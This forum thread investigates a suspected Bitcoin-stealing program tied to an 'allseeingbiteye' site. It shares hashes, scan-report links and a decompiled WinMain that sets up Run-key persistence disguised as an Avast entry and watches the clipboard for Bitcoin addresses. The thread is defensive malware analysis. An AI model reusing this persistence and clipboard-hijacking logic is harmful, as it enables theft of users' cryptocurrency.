Quote
mcfartietray.exe
...McFartieTray?! Sounds foul either way.
Topic: "allseingbiteye" - a virus, or just weird? (Read 2377 times)
...McFartieTray?! Sounds foul either way.
Sorry for bumping, I found some new information...
A new link got added about a Bitcoin generator on some Tor forum.
"Bitcoin generator.exe" 51.735 bytes.
SHA256: 1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b
Virustotal: https://www.virustotal.com/file/1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b/analysis/
I found this thread due the fact he still uses c:\windows\mcfartietrby.exe
I also found this email in the binary data: [email protected]
Threatexpert for the file: http://www.threatexpert.com/report.aspx?md5=ede9632fc341e0279bb3f8a49b8730f1
A new link got added about a Bitcoin generator on some Tor forum.
"Bitcoin generator.exe" 51.735 bytes.
SHA256: 1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b
Virustotal: https://www.virustotal.com/file/1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b/analysis/
I found this thread due the fact he still uses c:\windows\mcfartietrby.exe
I also found this email in the binary data: [email protected]
Threatexpert for the file: http://www.threatexpert.com/report.aspx?md5=ede9632fc341e0279bb3f8a49b8730f1
It even makes the run entry look like it's an antivirus scanner (Avast72). 
Most certainly a virus/malware/spyware.
Most certainly a virus/malware/spyware.
decompiled winmain
That's pretty impressive. What tool did you use to do that?
most likely a virus
decompiled winmain
it adds a program to system startup. pretty suspicious imo.
virus scan https://www.virustotal.com/file/d99c08d052a02e82ca1ae0ca17300f30c2a4fe8861fe8426afb4367b30daa279/analysis/1327723958/
runtime analysis: http://anubis.iseclab.org/?action=result&task_id=17f90702efa19eb14a9df4ac9504bbf98&format=html
decompiled winmain
Code:
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
int v4; // ebx@1
unsigned int v5; // eax@9
SIZE_T v6; // edi@10
HANDLE v7; // esi@10
const char *v8; // ecx@11
HANDLE v9; // eax@11
void *v10; // esi@11
const CHAR *v11; // eax@11
int v12; // ecx@14
int v13; // edi@14
CHAR v14; // al@15
HKEY hKey; // [sp+Ch] [bp-17Ch]@30
char v17; // [sp+13h] [bp-175h]@3
void *v18; // [sp+14h] [bp-174h]@29
unsigned int v19; // [sp+28h] [bp-160h]@28
const char *v20; // [sp+30h] [bp-158h]@9
int v21; // [sp+40h] [bp-148h]@9
unsigned int v22; // [sp+44h] [bp-144h]@9
CHAR ExistingFileName; // [sp+4Ch] [bp-13Ch]@1
char v24; // [sp+61h] [bp-127h]@2
char v25; // [sp+68h] [bp-120h]@1
CHAR String1[52]; // [sp+150h] [bp-38h]@11
unsigned int v27; // [sp+184h] [bp-4h]@1
int v28; // [sp+188h] [bp+0h]@1
v27 = (unsigned int)&v28 ^ __security_cookie;
v4 = operator new(4u);
*(_DWORD *)v4 = 33120;
dword_40D9E4 = v4;
memcpy(&ExistingFileName, "c:\\windows\\mcfartietrby.exe", 0x1Cu);
memset(&v25, 0, 0xE8u);
if ( sub_401040() == *(_DWORD *)v4 + 9 )
--v24;
*(_DWORD *)v4 += 9;
v17 = strcmp(&ExistingFileName, (const char *)"c:\\windows\\mcfartietray.exe") == 0;
if ( sub_401040() == *(_DWORD *)v4 )
{
if ( v17 )
{
if ( byte_40D9E8 )
GetModuleFileNameA(0, &ExistingFileName, 0x104u);
}
}
if ( CopyFileA(&ExistingFileName, (LPCSTR)"c:\\windows\\mcfartietray.exe", 1) )
{
RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 2u, &hKey);
RegSetValueExA(hKey, "Avast72", 0, 1u, "c:\\windows\\mcfartietray.exe", 0x1Cu);
ShellExecuteA(0, 0, (LPCSTR)"c:\\windows\\mcfartietray.exe", 0, "c:\\", 0);
goto LABEL_31;
}
CreateMutexA(0, 0, "mcfartietray");
if ( GetLastError() == 183 )
{
LABEL_31:
v0 = 0;
return 0;
}
v5 = GetTickCount();
srand(v5);
v22 = 15;
v21 = 0;
LOBYTE(v20) = 0;
if ( v17 )
{
while ( 1 )
{
do
{
do
{
Sleep(0x1F4u);
OpenClipboard(0);
v7 = GetClipboardData(1u);
CloseClipboard();
v6 = GlobalSize(v7);
}
while ( v6 - 30 > 9 );
OpenClipboard(0);
v9 = GetClipboardData(1u);
v10 = v9;
v11 = (const CHAR *)GlobalLock(v9);
lstrcpyA(String1, v11);
GlobalUnlock(v10);
CloseClipboard();
v8 = v20;
if ( v22 < 0x10 )
v8 = (const char *)&v20;
}
while ( !strcmp(String1, v8) );
v13 = v6 - 1;
v12 = 0;
if ( v13 <= 0 )
{
LABEL_26:
if ( String1[0] == 49 || String1[0] == 51 )
{
sub_401430();
sub_401590();
if ( v19 >= 0x10 )
operator delete(v18);
}
}
else
{
while ( 1 )
{
v14 = String1[v12];
if ( v14 < 49 || v14 > 57 )
{
if ( (v14 < 97 || v14 > 122) && (v14 < 65 || v14 > 90) )
break;
}
if ( v14 == 108 || v14 == 73 || v14 == 79 || v14 == 48 )
break;
++v12;
if ( v12 >= v13 )
goto LABEL_26;
}
}
}
}
return 0;
}
virus scan https://www.virustotal.com/file/d99c08d052a02e82ca1ae0ca17300f30c2a4fe8861fe8426afb4367b30daa279/analysis/1327723958/
runtime analysis: http://anubis.iseclab.org/?action=result&task_id=17f90702efa19eb14a9df4ac9504bbf98&format=html
On the Bitcoin SE someone mentioned this site:
http://allseeingbiteye.tk/
Question can be found here:
http://bitcoin.stackexchange.com/q/2778/323
Has anyone checked whether this website is distributing some sort of virus?
http://allseeingbiteye.tk/
Question can be found here:
http://bitcoin.stackexchange.com/q/2778/323
Has anyone checked whether this website is distributing some sort of virus?
Jump to: